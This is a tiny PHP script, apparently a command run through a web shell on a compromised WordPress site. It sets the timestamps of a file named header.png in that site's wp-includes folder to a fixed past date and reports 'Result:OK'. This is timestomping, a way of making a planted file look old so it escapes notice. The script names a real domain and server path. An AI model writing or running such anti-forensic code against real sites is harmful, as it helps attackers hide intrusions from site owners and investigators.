<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";ob_start();if(touch('/home/admin/domains/shop.rst.ge/public_html/wp-includes/header.png', 1721235138, 1721235138)) echo "touched";$c = ob_get_clean();print("<textarea>$c</textarea>");echo "Result:OK"; echo "</body></html>";  die;